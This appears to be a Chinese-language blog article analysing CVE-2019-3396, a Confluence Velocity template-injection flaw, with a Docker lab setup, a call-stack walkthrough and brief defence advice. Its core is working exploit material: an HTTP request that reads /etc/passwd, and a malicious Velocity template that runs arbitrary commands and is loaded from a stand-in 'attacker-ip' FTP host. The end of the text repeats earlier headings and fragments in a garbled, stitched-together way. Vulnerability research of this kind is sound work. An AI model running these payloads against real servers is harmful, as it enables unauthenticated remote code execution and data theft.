CVE-2019-3396 Confluence Velocity SSTI漏洞深度分析与利用指南<\/h1>

漏洞概述<\/h2>
CVE-2019-3396是Atlassian Confluence Server和Data Center中widgetconnector组件存在的一个严重安全漏洞，允许攻击者在无需认证的情况下进行未授权访问，通过精心构造的JSON字符串触发Velocity模板注入，实现任意文件读取和远程代码执行。<\/p>

影响版本<\/h3>

6.6.12之前的版本<\/li>
6.7.0至6.12.3（不含6.12.3）<\/li>
6.13.0至6.13.3（不含6.13.3）<\/li>

6.14.0至6.14.3（不含6.14.3）<\/li> <\/ul>

影响组件<\/h3>

widgetconnector.jar ≤ 3.1.3<\/li> <\/ul>

Apache Velocity基础<\/h2>

Velocity简介<\/h3>
Apache Velocity是一个基于Java的模板引擎，提供模板语言引用Java代码定义的对象，遵循MVC设计模式。<\/p>

基本语法<\/h3>

语句标识符<\/h4>

#<\/code> 标识Velocity脚本语句<\/li>

$<\/code> 标识变量<\/li>
<\/ul>
变量声明<\/h4>
#set($a = "velocity")
#set($b = 1)
#set($array = ["1", "2"])
<\/code><\/pre>
注释<\/h4>

单行注释：##<\/code><\/li>
多行注释：#* ... *#<\/code><\/li>
<\/ul>
逻辑运算<\/h4>
支持 ==<\/code>, &&<\/code>, ||<\/code>, !<\/code> 等运算符<\/p>
条件语句<\/h4>
#if($foo < 10)
    <strong>1<\/strong>
#elseif($foo == 10)
    <strong>2<\/strong>
#else
    <strong>4<\/strong>
#end
<\/code><\/pre>
单双引号区别<\/h4>

单引号不解析引用内容<\/li>
双引号解析引用内容<\/li>
<\/ul>
属性访问<\/h4>
通过.<\/code>操作符访问对象属性和方法<\/p>
#set($e = "e")
$e.getClass()
<\/code><\/pre>
Velocity模板注入(RCE)<\/h2>
恶意模板示例<\/h3>
#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("touch \/tmp\/rai4over")
<\/code><\/pre>
执行流程<\/h3>

初始化Velocity引擎<\/li>
创建上下文并添加变量<\/li>
加载恶意模板<\/li>
合并上下文渲染模板<\/li>
通过反射执行命令<\/li>
<\/ol>
漏洞环境搭建<\/h2>
Docker环境配置<\/h3>
version<\/span>: '2'<\/span>
<\/span><\/span>services<\/span>:
<\/span><\/span>  web<\/span>:
<\/span><\/span>    image<\/span>: vulhub\/confluence:6.10.2<\/span>
<\/span><\/span>    ports<\/span>:
<\/span><\/span>      - "8888:8090"<\/span>
<\/span><\/span>      - "9999:9999"<\/span>
<\/span><\/span>    depends_on<\/span>:
<\/span><\/span>      - db<\/span>
<\/span><\/span>  db<\/span>:
<\/span><\/span>    image<\/span>: postgres:10.7-alpine<\/span>
<\/span><\/span>    environment<\/span>:
<\/span><\/span>      - POSTGRES_PASSWORD=postgres<\/span>
<\/span><\/span>      - POSTGRES_DB=confluence<\/span>
<\/span><\/span><\/code><\/pre>开启远程调试<\/h3>
修改\/opt\/atlassian\/confluence\/bin\/setenv.sh<\/code>，添加：<\/p>
CATALINA_OPTS=<\/span>"-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=9999 <\/span>${<\/span>CATALINA_OPTS}<\/span>"<\/span>
<\/span><\/span><\/code><\/pre>漏洞复现<\/h2>
文件读取POC<\/h3>
POST<\/span> \/rest\/tinymce\/1\/macro\/preview HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target:8090<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>    "contentId"<\/span>: "786458"<\/span>,
<\/span><\/span>    "macro"<\/span>: {
<\/span><\/span>        "name"<\/span>: "widget"<\/span>,
<\/span><\/span>        "params"<\/span>: {
<\/span><\/span>            "url"<\/span>: "https:\/\/metacafe.com\/v\/23464dc6"<\/span>,
<\/span><\/span>            "_template"<\/span>: "file:\/\/\/etc\/passwd"<\/span>
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>远程命令执行<\/h3>
恶意模板(exp.vm)<\/h4>
#set ($e="exp")
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\A"))
#if($scan.hasNext())
$scan.next()
#end
<\/code><\/pre>
执行命令请求<\/h4>
POST<\/span> \/rest\/tinymce\/1\/macro\/preview HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target:8090<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>    "contentId"<\/span>: "786458"<\/span>,
<\/span><\/span>    "macro"<\/span>: {
<\/span><\/span>        "name"<\/span>: "widget"<\/span>,
<\/span><\/span>        "params"<\/span>: {
<\/span><\/span>            "url"<\/span>: "https:\/\/metacafe.com\/v\/23464dc6"<\/span>,
<\/span><\/span>            "_template"<\/span>: "ftp:\/\/attacker-ip\/exp.vm"<\/span>,
<\/span><\/span>            "cmd"<\/span>: "whoami"<\/span>
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞分析<\/h2>
攻击链分析<\/h3>

WidgetMacro.execute()<\/code> 处理传入参数<\/li>
调用 DefaultRenderManager.getEmbeddedHtml()<\/code><\/li>
匹配渲染器（如MetacafeRenderer<\/code>）<\/li>
通过DefaultVelocityRenderService.render()<\/code>处理模板<\/li>
VelocityUtils.getRenderedTemplate()<\/code>加载远程模板<\/li>
模板解析执行恶意代码<\/li>
<\/ol>
关键调用栈<\/h3>
Runtime.exec()
  → Method.invoke()
  → UberspectImpl$VelMethodImpl.invoke()
  → ASTMethod.execute()
  → ASTReference.execute()
  → SimpleNode.render()
  → Template.merge()
  → VelocityUtils.renderTemplateWithoutSwallowingErrors()
  → DefaultVelocityRenderService.render()
  → MetacafeRenderer.getEmbeddedHtml()
  → DefaultRenderManager.getEmbeddedHtml()
  → WidgetMacro.execute()
<\/code><\/pre>
防御建议<\/h2>

及时升级到安全版本<\/li>
限制外部模板加载<\/li>
实施严格的输入验证<\/li>
禁用不必要的宏功能<\/li>
使用Web应用防火墙规则过滤恶意请求<\/li>
<\/ol>
参考资源<\/h2>

Atlassian官方安全公告<\/li>
Velocity官方文档<\/li>
漏洞分析文章和技术博客<\/li>
相关CVE详情和利用代码<\/li>
<\/ol>

CVE-2019-3396 Confluence Velocity SSTI漏洞深度分析与利用指南<\/h1>

Apache Velocity基础<\/h2>

Velocity简介<\/h3> Apache Velocity是一个基于Java的模板引擎，提供模板语言引用Java代码定义的对象，遵循MVC设计模式。<\/p>

基本语法<\/h3>

逻辑运算<\/h4> 支持 ==<\/code>, &&<\/code>, ||<\/code>, !<\/code> 等运算符<\/p>

Velocity模板注入(RCE)<\/h2>

漏洞环境搭建<\/h2>

漏洞复现<\/h2>

远程命令执行<\/h3>

漏洞分析<\/h2>

参考资源<\/h2> Atlassian官方安全公告<\/li> Velocity官方文档<\/li> 漏洞分析文章和技术博客<\/li> 相关CVE详情和利用代码<\/li> <\/ol>

Velocity简介<\/h3>
Apache Velocity是一个基于Java的模板引擎，提供模板语言引用Java代码定义的对象，遵循MVC设计模式。<\/p>

逻辑运算<\/h4>
支持 `==<\/code>, &&<\/code>, ||<\/code>, !<\/code> 等运算符<\/p>`

参考资源<\/h2>

Atlassian官方安全公告<\/li>
Velocity官方文档<\/li>
漏洞分析文章和技术博客<\/li>
相关CVE详情和利用代码<\/li> <\/ol>